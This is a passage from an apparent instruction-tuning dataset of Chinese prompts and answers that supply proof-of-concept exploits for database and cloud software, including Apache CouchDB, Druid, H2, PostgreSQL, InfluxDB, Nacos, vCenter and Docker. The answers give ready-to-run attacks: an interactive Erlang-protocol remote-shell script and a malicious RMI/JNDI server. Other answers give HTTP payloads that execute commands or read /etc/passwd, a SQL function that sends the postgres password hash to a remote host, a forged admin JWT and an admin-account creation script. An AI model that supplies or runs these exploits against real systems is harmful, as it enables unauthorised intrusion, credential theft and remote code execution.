  #print(\"L---data_size: %d, data_recv_size: %d\" %(data_size,len(data)))\n        time.sleep(0.1)\n        print(data.decode(),end = '')\n        data_size -= 1024\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/Apache CouchDB epmd 远程命令执行漏洞 CVE-2022-24706.md"}
    480. 

  480. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ElasticSearch 目录穿越漏洞 CVE-2015-3337\n漏洞描述:在安装了具有“site”功能的插件以后,插件目录使用`../`即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。\n影响版本:``` Elasticsearch 1.4.5以下/1.5.2以下 ```\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【CVE编号】CVE-2015-3337\n【POC利用方法】\n1. Elasticsearch 1.4.5以下/1.5.2以下\n2. docker-compose build\ndocker-compose up -d\n3. 访问`http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd`读取任意文件(不要在浏览器访问):\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/ElasticSearch 目录穿越漏洞 CVE-2015-3337.md"}
    481. 

  481. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:H2 Database Console 未授权访问\n漏洞描述:H2 database是一款Java内存数据库,多用于单元测试。H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权: ``` spring.h2.console.enabled=true spring.h2.console.settings.web-allow-others=true ``` 利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。 参考链接: - https://mp.weixin.qq.com/s?__biz=MzI2NTM1MjQ3OA==&mid=2247483658&idx=1&sn=584710da0fbe56c1246755147bcec48e\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【POC利用方法】\n1. spring.h2.console.enabled=true\nspring.h2.console.settings.web-allow-others=true\n2. docker-compose up -d\n3. import java.rmi.registry.*;\nimport com.sun.jndi.rmi.registry.*;\nimport javax.naming.*;\nimport org.apache.naming.ResourceRef;\n \npublic class EvilRMIServerNew {\n    public static void main(String[] args) throws Exception {\n        System.out.println(\"Creating evil RMI registry on port 1097\");\n        Registry registry = LocateRegistry.createRegistry(1097);\n \n        //prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory\n        ResourceRef ref = new ResourceRef(\"javax.el.ELProcessor\", null, \"\", \"\", true,\"org.apache.naming.factory.BeanFactory\",null);\n        //redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code\n        ref.add(new StringRefAddr(\"forceString\", \"x=eval\"));\n        //expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows\n        ref.add(new StringRefAddr(\"x\", \"\\\"\\\".getClass().forName(\\\"javax.script.ScriptEngineManager\\\").newInstance().getEngineByName(\\\"JavaScript\\\").eval(\\\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','nslookup jndi.s.artsploit.com']).start()\\\")\"));\n \n        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);\n        registry.bind(\"Object\", referenceWrapper);\n    }\n}\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/H2 Database Console 未授权访问.md"}
    482. 

  482. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Redis 小于5.0.5 主从复制 RCE\n漏洞描述:在2019年7月7日结束的WCTF2019 Final上,LC/BC的成员Pavel Toporkov在分享会上介绍了一种关于redis新版本的RCE利用方式,比起以前的利用方式来说,这种利用方式更为通用,危害也更大 [Pavel Toporkov的分享](https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf)\n影响版本:``` Redis <= 5.0.5 ```\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【POC利用方法】\n1. Redis <= 5.0.5\n2. docker pull damonevking/redis5.0 \ndocker run -p 6379:6379 -d damonevking/redis5.0 redis-server\n3. root@kali:~/桌面# docker pull damonevking/redis5.0 \nUsing default tag: latest\n\nlatest: Pulling from damonevking/redis5.0\nfc7181108d40: Pull complete \n3e0ac67cad82: Pull complete \n6ee495cb7235: Pull complete \n9f7206d08b9d: Pull complete \na8354ef8cccb: Pull complete \n53afb10d81c2: Pull complete \nDigest: sha256:adcf62f378efe1187d2f72c6f0ecdf86ab2173a9e1c3c9f4fe4bb89060f5362f\nStatus: Downloaded newer image for damonevking/redis5.0:latest\ndocker.io/damonevking/redis5.0:latest\nroot@kali:~/桌面# docker run -p 6379:6379 -d damonevking/redis5.0 redis-server\n1275aa9c6c8f8ad0b6c8e58e609be6681acedec301b5593f7e8b0bd65f7fad12\nroot@kali:~/桌面# nmap 127.0.0.1 -p 6379\nStarting Nmap 7.80 ( https://nmap.org ) at 2020-12-08 21:47 CST\nNmap scan report for localhost (127.0.0.1)\nHost is up (0.000099s latency).\n\nPORT     STATE SERVICE\n6379/tcp open  redis\n\nNmap done: 1 IP address (1 host up) scanned in 0.10 seconds\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/Redis 小于5.0.5 主从复制 RCE.md"}
    483. 

  483. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Druid 远程代码执行漏洞 QVD-2023-9629\n漏洞描述:该漏洞源于 Apache Kafka Connect JNDI 注入漏洞(CVE-2023-25194),Apache Druid 由于支持从 Kafka 加载数据,刚好满足其利用条件,攻击者可通过修改Kafka 连接配置属性进行 JNDI 注入攻击,进而在服务端执行任意恶意代码。\n影响版本:``` Apache Druid <= 25.0.0 ```\n网络测绘:``` title=\"Apache Druid\" ```\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【POC利用方法】\n1. Apache Druid <= 25.0.0\n2. title=\"Apache Druid\"\n3. POST /druid/indexer/v1/sampler?for=connect HTTP/1.1\nHost: your-ip\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\nContent-Length: 1437\nConnection: close\n\n{\n    \"type\":\"kafka\",\n    \"spec\":{\n        \"type\":\"kafka\",\n        \"ioConfig\":{\n            \"type\":\"kafka\",\n            \"consumerProperties\":{\n                \"bootstrap.servers\":\"1.1.1.1:9092\",\n                \"sasl.mechanism\":\"SCRAM-SHA-256\",\n                \"security.protocol\":\"SASL_SSL\",\n                \"sasl.jaas.config\":\"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\\\"ldap://your-ip\\\" useFirstPass=\\\"true\\\" serviceName=\\\"x\\\" debug=\\\"true\\\" group.provider.url=\\\"xxx\\\";\"\n            },\n            \"topic\":\"any\",\n            \"useEarliestOffset\":true,\n            \"inputFormat\":{\n                \"type\":\"regex\",\n                \"pattern\":\"([\\\\s\\\\S]*)\",\n                \"listDelimiter\":\"56616469-6de2-9da4-efb8-8f416e6e6965\",\n                \"columns\":[\n                    \"raw\"\n                ]\n            }\n        },\n        \"dataSchema\":{\n            \"dataSource\":\"sample\",\n            \"timestampSpec\":{\n                \"column\":\"!!!_no_such_column_!!!\",\n                \"missingValue\":\"1970-01-01T00:00:00Z\"\n            },\n            \"dimensionsSpec\":{\n\n            },\n            \"granularitySpec\":{\n                \"rollup\":false\n            }\n        },\n        \"tuningConfig\":{\n            \"type\":\"kafka\"\n        }\n    },\n    \"samplerConfig\":{\n        \"numRows\":500,\n        \"timeoutMs\":15000\n    }\n}\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/Apache Druid 远程代码执行漏洞 QVD-2023-9629.md"}
    484. 

  484. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Druid 代码执行漏洞 CVE-2021-25646\n漏洞描述:Apache Druid是一个开源的分布式数据存储。 Apache Druid包括执行嵌入在各种类型请求中的用户提供的JavaScript代码的能力。这个功能是为了在可信环境下使用,并且默认是禁用的。然而,在Druid 0.20.0及以前的版本中,攻击者可以通过发送一个恶意请求使Druid用内置引擎执行任意JavaScript代码,而不管服务器配置如何,这将导致代码和命令执行漏洞。 参考链接: - https://blogs.juniper.net/en-us/threat-research/cve-2021-25646-apache-druid-embedded-javascript-remote-code-execution - https://mp.weixin.qq.com/s/McAoLfyf_tgFIfGTAoRCiw\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【CVE编号】CVE-2021-25646\n【POC利用方法】\n1. docker-compose up -d\n2. POST /druid/indexer/v1/sampler HTTP/1.1\nHost: your-ip:8888\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en-US;q=0.9,en;q=0.8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36\nConnection: close\nCache-Control: max-age=0\nContent-Type: application/json\n\n{\n    \"type\":\"index\",\n    \"spec\":{\n        \"ioConfig\":{\n            \"type\":\"index\",\n            \"firehose\":{\n                \"type\":\"local\",\n                \"baseDir\":\"/etc\",\n                \"filter\":\"passwd\"\n            }\n        },\n        \"dataSchema\":{\n            \"dataSource\":\"test\",\n            \"parser\":{\n                \"parseSpec\":{\n                \"format\":\"javascript\",\n                \"timestampSpec\":{\n\n                },\n                \"dimensionsSpec\":{\n\n                },\n                \"function\":\"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\\\"sh\\\",\\\"-c\\\",\\\"id\\\"]).getInputStream()).useDelimiter(\\\"\\\\A\\\").next();return {timestamp:123123,test: a}}\",\n                \"\":{\n                    \"enabled\":\"true\"\n                }\n                }\n            }\n        }\n    },\n    \"samplerConfig\":{\n        \"numRows\":10\n    }\n}\n3. - https://mp.weixin.qq.com/s/McAoLfyf_tgFIfGTAoRCiw\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/Apache Druid 代码执行漏洞 CVE-2021-25646.md"}
    485. 

  485. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache CouchDB 分布式协议代码执行 CVE-2022-24706\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【CVE编号】CVE-2022-24706\n【POC利用方法】\n1. docker-compose up -d\n2. python poc.py target-ip 4369\n3. # Exploit Title: Remote Command Execution via Erlang Distribution Protocol \n# Date: 2022-01-21\n# Exploit Author: Konstantin Burov, @_sadshade\n# Software Link: https://www.erlang.org/doc/apps/erts/erl_dist_protocol.html\n# Version: N/A\n# Tested on: Kali 2021.2\n# Based on 1F98D's Erlang Cookie - Remote Code Execution\n# Shodan: port:4369 \"name \"\n# References:\n#  https://www.exploit-db.com/exploits/49418\n#  https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/\n#  https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce\n# \n#\n#!/usr/local/bin/python3\n\nimport socket\nfrom hashlib import md5\nimport struct\nimport sys\nimport re\nimport time\n\nTARGET = sys.argv[1]\nEPMD_PORT = int(sys.argv[2]) # Default Erlang distributed port\nCOOKIE = \"monster\" # Default Erlang cookie for CouchDB \nERLNAG_PORT = 0\nEPM_NAME_CMD = b\"\\x00\\x01\\x6e\" # Request for nodes list\n\n# Some data:\nNAME_MSG  = b\"\\x00\\x15n\\x00\\x05\\x00\\x07\\x49\\x9cAAAAAA@AAAAAAA\"\nCHALLENGE_REPLY = b\"\\x00\\x15r\\x01\\x02\\x03\\x04\"\nCTRL_DATA  = b\"\\x83h\\x04a\\x06gw\\x0eAAAAAA@AAAAAAA\\x00\\x00\\x00\\x03\"\nCTRL_DATA += b\"\\x00\\x00\\x00\\x00\\x00w\\x00w\\x03rex\"\n\n\ndef compile_cmd(CMD):\n    MSG  = b\"\\x83h\\x02gw\\x0eAAAAAA@AAAAAAA\\x00\\x00\\x00\\x03\\x00\\x00\\x00\"\n    MSG += b\"\\x00\\x00h\\x05w\\x04callw\\x02osw\\x03cmdl\\x00\\x00\\x00\\x01k\"\n    MSG += struct.pack(\">H\", len(CMD))\n    MSG += bytes(CMD, 'ascii')\n    MSG += b'jw\\x04user'\n    PAYLOAD = b'\\x70' + CTRL_DATA + MSG\n    PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD\n    return PAYLOAD\n\nprint(\"Remote Command Execution via Erlang Distribution Protocol.\\n\")\n\n# Connect to EPMD:\ntry:\n    epm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    epm_socket.connect((TARGET, EPMD_PORT))\nexcept socket.error as msg:\n    print(\"Couldnt connect to EPMD: %s\\n terminating program\" % msg)\n    sys.exit(1)\n    \nepm_socket.send(EPM_NAME_CMD) #request Erlang nodes\nif epm_socket.recv(4) == b'\\x00\\x00\\x11\\x11': # OK\n    data = epm_socket.recv(1024)\n    data = data[0:len(data) - 1].decode('ascii')\n    data = data.split(\"\\n\")\n    if len(data) == 1:\n        choise = 1\n        print(\"Found \" + data[0])\n    else:\n        print(\"\\nMore than one node found, choose which one to use:\")\n        line_number = 0\n        for line in data:\n            line_number += 1\n            print(\" %d) %s\" %(line_number, line))\n        choise = int(input(\"\\n> \"))\n        \n    ERLNAG_PORT = int(re.search(\"\\d+$\",data[choise - 1])[0])\nelse:\n    print(\"Node list request error, exiting\")\n    sys.exit(1)\nepm_socket.close()\n\n# Connect to Erlang port:\ntry:\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect((TARGET, ERLNAG_PORT))\nexcept socket.error as msg:\n    print(\"Couldnt connect to Erlang server: %s\\n terminating program\" % msg)\n    sys.exit(1)\n   \ns.send(NAME_MSG)\ns.recv(5)\nchallenge = s.recv(1024)     # Receive \"challenge\" message\nprint(challenge)\nchallenge = struct.unpack(\">I\", challenge[9:13])[0]\n\n#print(\"Extracted challenge: {}\".format(challenge))\n\n# Add Challenge Digest\nCHALLENGE_REPLY += md5(bytes(COOKIE, \"ascii\")\n    + bytes(str(challenge), \"ascii\")).digest()\ns.send(CHALLENGE_REPLY)\nCHALLENGE_RESPONSE = s.recv(1024)\n\nif len(CHALLENGE_RESPONSE) == 0:\n    print(\"Authentication failed, exiting\")\n    sys.exit(1)\n\nprint(\"Authentication successful\")\nprint(\"Enter command:\\n\")\n\ndata_size = 0\nwhile True:\n    if data_size <= 0:\n        CMD = input(\"> \")\n        if not CMD:\n            continue\n        elif CMD == \"exit\":\n            sys.exit(0)\n        s.send(compile_cmd(CMD))\n        data_size = struct.unpack(\">I\", s.recv(4))[0] # Get data size\n        s.recv(45)              # Control message\n        data_size -= 45         # Data size without control message\n        time.sleep(0.1)\n    elif data_size < 1024:        \n        data = s.recv(data_size)\n        #print(\"S---data_size: %d, data_recv_size: %d\" %(data_size,len(data)))\n        time.sleep(0.1)\n        print(data[3:].decode())\n        data_size = 0\n    else:        \n        data = s.recv(1024)\n        #print(\"L---data_size: %d, data_recv_size: %d\" %(data_size,len(data)))\n        time.sleep(0.1)\n        print(data[4:].decode())\n        data_size -= 1024\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/Apache CouchDB 分布式协议代码执行 CVE-2022-24706.md"}
    486. 

  486. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:PostgreSQL 提权漏洞 CVE-2018-1058\n漏洞描述:PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。 参考链接: - https://wiki.postgresql.org/wiki/A_Guide_to_CVE-2018-1058:_Protect_Your_Search_Path - https://xianzhi.aliyun.com/forum/topic/2109\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【CVE编号】CVE-2018-1058\n【POC利用方法】\n1. docker-compose up -d\n2. CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$\n    select dblink_connect((select 'hostaddr=10.0.0.1 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); \n    SELECT pg_catalog.array_to_string($1,$2);\n$$ LANGUAGE SQL VOLATILE;\n3. CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/PostgreSQL 提权漏洞 CVE-2018-1058.md"}
    487. 

  487. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Elasticsearch 未授权访问\n漏洞描述:Elasticsearch是用Java开发的企业级搜索引擎,默认端口9200,存在未授权访问漏洞时,可被非法操作数据\n影响版本:``` Elasticsearch ```\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【POC利用方法】\n1. Elasticsearch\n2. http://localhost:9200/_cat/indices\nhttp://localhost:9200/_river/_search //查看数据库敏感信息\nhttp://localhost:9200/_nodes         //查看节点数据\nhttp://localhost:9200/_plugin/head/  //web管理界面(head插件)\n3. 访问目标URL : http://xxx.xxx.xxx.xxx:9200/_node\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/Elasticsearch 未授权访问.md"}
    488. 

  488. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Neo4j Shell Server 反序列化漏洞 CVE-2021-34371\n漏洞描述:Neo4j是一个开源图数据库管理系统。 在Neo4j 3.4.18及以前,如果开启了Neo4j Shell接口,攻击者将可以通过RMI协议以未授权的身份调用任意方法,其中`setSessionVariable`方法存在反序列化漏洞。因为这个漏洞并非RMI反序列化,所以不受到Java版本的影响。 在Neo4j 3.5及之后的版本,Neo4j Shell被Cyber Shell替代。 参考链接: - https://www.exploit-db.com/exploits/50170 - https://github.com/mozilla/rhino/issues/520\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【CVE编号】CVE-2021-34371\n【POC利用方法】\n1. TARGET_IP=<your-ip> docker-compose up -d\n2. $ mvn install\n$ cp target/rhino_gadget-1.0-SNAPSHOT-fatjar.jar ./\n$ java -jar rhino_gadget-1.0-SNAPSHOT-fatjar.jar rmi://192.168.174.128:1337 \"touch /tmp/success\"\n3. 服务启动后,访问`http://your-ip:7474`即可查看到Web管理页面,但我们需要攻击的是其1337端口,这个端口是Neo4j Shell端口,使用RMI协议通信。\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/Neo4j Shell Server 反序列化漏洞 CVE-2021-34371.md"}
    489. 

  489. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:InfluxDB JWT 认证绕过漏洞 CVE-2019-20933\n漏洞描述:InfluxDB是一款著名的时序数据库,其使用jwt作为鉴权方式。 在其1.7.6版本以前,默认设置jwt的认证密钥`shared-secret`为空字符串,导致攻击者可以伪造任意用户身份在InfluxDB中执行SQL语句。 参考链接: - https://www.komodosec.com/post/when-all-else-fails-find-a-0-day - https://github.com/influxdata/influxdb/issues/12927 - https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 - https://docs.influxdata.com/influxdb/v1.7/administration/config/#http-endpoints-settings\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【CVE编号】CVE-2019-20933\n【POC利用方法】\n1. docker-compose up -d\n2. {\n  \"alg\": \"HS256\",\n  \"typ\": \"JWT\"\n}\n{\n  \"username\": \"admin\",\n  \"exp\": 1998787794\n}\n3. POST /query HTTP/1.1\nHost: your-ip:8086\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nAuthorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxOTk4Nzg3Nzk0fQ.i69iSGK3q5OCEX0aExMKHciDG7nivuz4xHTgyj4-CPY\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 12\n\ndb=sample&q=show+users\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/InfluxDB JWT 认证绕过漏洞 CVE-2019-20933.md"}
    490. 

  490. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:VMware vCenter Server 任意文件读取漏洞\n漏洞描述:VMware vCenter Server 特定版本存在任意文件读取漏洞,攻击者通过构造特定的请求,可以读取服务器上任意文件。\n影响版本:``` VMware vCenter Server 6.5.0a- f 版本 ```\n网络测绘:``` title=\"ID_VC_Welcome\" ```\n", "input": "", "output": "【漏洞类型】cloud_security_vulnerability\n【POC利用方法】\n1. VMware vCenter Server 6.5.0a- f 版本\n2. title=\"ID_VC_Welcome\"\n3. http://xxx.xxx.xxx.xxx/eam/vib?id=C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx\\vcdb.properties\n", "category": "poc_cloud_security_vulnerability", "source": "awesome_poc_dataset", "file_path": "云安全漏洞/VMware vCenter Server 任意文件读取漏洞.md"}
    491. 

  491. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Docker daemon api 未授权访问漏洞 RCE\n漏洞描述:Docker 是一个开源的应用容器引擎,让开发者可以打包应用及依赖包到一个轻量级、可移植的容器中,然后发布到 Linux 机器上,也可以实现虚拟化。Docker swarm 是 Docker 的集群管理工具,提供了标准的 Docker API。 在使用 Docker swarm 的时候,管理的 Docker节点上会开放一个 TCP 端口 2375,绑定在 0.0.0.0 上,直接 HTTP 访问会返回 “404 Not Found”。可以通过该 API 执行 Docker 命令,例如创建/删除 container、拉取 image、执行反弹 shell。 参考链接: - [http://www.loner.fm/drops/#!/drops/1203.%E6%96%B0%E5%A7%BF%E5%8A%BF%E4%B9%8BDocker%20Remote%20API%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%92%8C%E5%88%A9%E7%94%A8](http://www.loner.fm/drops/#!/drops/1203.新姿势之Docker Remote API未授权访问漏洞分析和利用)\n", "input": "", "output": "【漏洞类型】cloud_security_vulnerability\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. http://your-ip:2375/containers/json\n3. docker -H tcp://your-ip:2375 images\n", "category": "poc_cloud_security_vulnerability", "source": "awesome_poc_dataset", "file_path": "云安全漏洞/Docker daemon api 未授权访问漏洞 RCE.md"}
    492. 

  492. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:VMware vCenter Server 任意文件上传漏洞 CVE-2021-22005\n漏洞描述:VMware是一家云基础架构和移动商务解决方案厂商,提供基于VMware的虚拟化解决方案。 2021年9月22日,VMware官方发布安全公告,披露了包括 CVE-2021-22005 VMware vCenter Server 任意文件上传漏洞在内的多个中高危严重漏洞。在CVE-2021-22005中,攻击者可构造恶意请求,通过vCenter中的Analytics服务,可上传恶意文件,从而造成远程代码执行漏洞。\n影响版本:``` VMware vCenter Server 7.0系列 < 7.0 U2c VMware vCenter Server 6.7系列 < 6.7 U3o VMware vCenter Server 6.5系列 不受漏洞影响 ``` 其余漏洞受影响版本可参考 :https://www.vmware.com/security/advisories/VMSA-2021-0020.html 安全版本: ``` VMware vCenter Server 7.0 U2c VMware vCenter Server 6.7 U3o ```\n", "input": "", "output": "【漏洞类型】cloud_security_vulnerability\n【CVE编号】CVE-2021-22005\n【POC利用方法】\n1. VMware vCenter Server 7.0系列 < 7.0 U2c \nVMware vCenter Server 6.7系列 < 6.7 U3o \nVMware vCenter Server 6.5系列 不受漏洞影响\n2. VMware vCenter Server 7.0 U2c \nVMware vCenter Server 6.7 U3o\n3. curl -k -v \"https://your-ip/analytics/telemetry/ph/api/level?_c=test\"\n", "category": "poc_cloud_security_vulnerability", "source": "awesome_poc_dataset", "file_path": "云安全漏洞/VMware vCenter Server 任意文件上传漏洞 CVE-2021-22005.md"}
    493. 

  493. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Nacos 认证绕过漏洞 CVE-2021-29441\n漏洞描述:Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。 该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。并且利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息。 参考链接: - https://github.com/advisories/GHSA-36hp-jr8h-556f\n", "input": "", "output": "【漏洞类型】cloud_security_vulnerability\n【CVE编号】CVE-2021-29441\n【POC利用方法】\n1. docker-compose up -d\n2. docker-compose restart nacos\n3. #!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\n\nimport requests\n\nheaders = {\n    \"User-Agent\": \"Nacos-Server\"\n}\n\n\ndef check(target):\n    endpoint = \"/nacos/v1/auth/users?pageNo=1&pageSize=9\"\n    r = requests.get(target.strip(\"/\") + endpoint, headers=headers)\n    if r.status_code == 200 and \"pageItems\" in r.text:\n        print target + \" has vulnerabilities\"\n        return True\n    print target + \"has not vulnerabilities\"\n    return False\n\n\ndef add_user(target):\n    add_user_endpoint = \"/nacos/v1/auth/users?username=vulhub&password=vulhub\"\n\n    r = requests.post(target.strip(\"/\") + add_user_endpoint, headers=headers)\n    if r.status_code == 200 and \"create user ok\" in r.text:\n        print \"Add User Success\"\n        print \"New User Info: vulhub/vulhub\"\n        print \"Nacos Login Endpoint: {}/nacos/\".format(target)\n        exit(1)\n\n    print \"Add User Failed\"\n\n\nif __name__ == '__main__':\n    if len(sys.argv) != 2:\n        print \"Please specify the target: python poc.py http://xxxxx:8848\"\n        exit(-1)\n    if check(sys.argv[1]):\n        add_user(sys.argv[1])\n", "category": "poc_cloud_security_vulnerability", "source": "awesome_poc_dataset", "file_path": "云安全漏洞/Nacos 认证绕过漏洞 CVE-2021-29441.md"}
    494. 

  494. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:MinIO SSRF 漏洞 CVE-2021-21287\n漏洞描述:随着工作和生活中的一些环境逐渐往云端迁移,对象存储的需求也逐渐多了起来,[MinIO](https://min.io/)就是一款支持部署在私有云的开源对象存储系统。MinIO完全兼容AWS S3的协议,也支持作为S3的网关,所以在全球被广泛使用,在Github上已有25k star。MinIO中存在SSRF漏洞,通过漏洞可以获取敏感信息或远程命令执行 参考阅读: - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html\n影响版本:``` MinIO ```\n", "input": "", "output": "【漏洞类型】cloud_security_vulnerability\n【CVE编号】CVE-2021-21287\n【POC利用方法】\n1. // LoginSTS - STS user login handler.\nfunc (web *webAPIHandlers) LoginSTS(r *http.Request, args *LoginSTSArgs, reply *LoginRep) error {\n    ctx := newWebContext(r, args, \"WebLoginSTS\")\n\n    v := url.Values{}\n    v.Set(\"Action\", webIdentity)\n    v.Set(\"WebIdentityToken\", args.Token)\n    v.Set(\"Version\", stsAPIVersion)\n\n    scheme := \"http\"\n    // ...\n\n    u := &url.URL{\n        Scheme: scheme,\n        Host:   r.Host,\n    }\n\n    u.RawQuery = v.Encode()\n    req, err := http.NewRequest(http.MethodPost, u.String(), nil)\n    // ...\n}\n2. POST /minio/webrpc HTTP/1.1\nHost: 192.168.1.142:4444\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36\nContent-Type: application/json\nContent-Length: 80\n\n{\"id\":1,\"jsonrpc\":\"2.0\",\"params\":{\"token\":  \"Test\"},\"method\":\"web.LoginSTS\"}\n3. <?php\nheader('Location: http://192.168.1.142:4444/attack?arbitrary=params');\n", "category": "poc_cloud_security_vulnerability", "source": "awesome_poc_dataset", "file_path": "云安全漏洞/MinIO SSRF 漏洞 CVE-2021-21287.md"}
    495. 

  495. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Nacos secret.key 默认密钥 未授权访问漏洞\n漏洞描述:Alibaba Nacos 使用了固定的secret.key默认密钥,导致攻击者可以构造请求获取敏感信息,导致未授权访问漏洞\n影响版本:``` Alibaba Nacos <= 2.2.0 ```\n网络测绘:``` app=\"NACOS\" ```\n", "input": "", "output": "【漏洞类型】cloud_security_vulnerability\n【POC利用方法】\n1. Alibaba Nacos <= 2.2.0\n2. app=\"NACOS\"\n3. /nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ&pageNo=1&pageSize=9\n", "category": "poc_cloud_security_vulnerability", "source": "awesome_poc_dataset", "file_path": "云安全漏洞/Nacos secret.key 默认密钥 未授权访问漏洞.md"}
    496. 

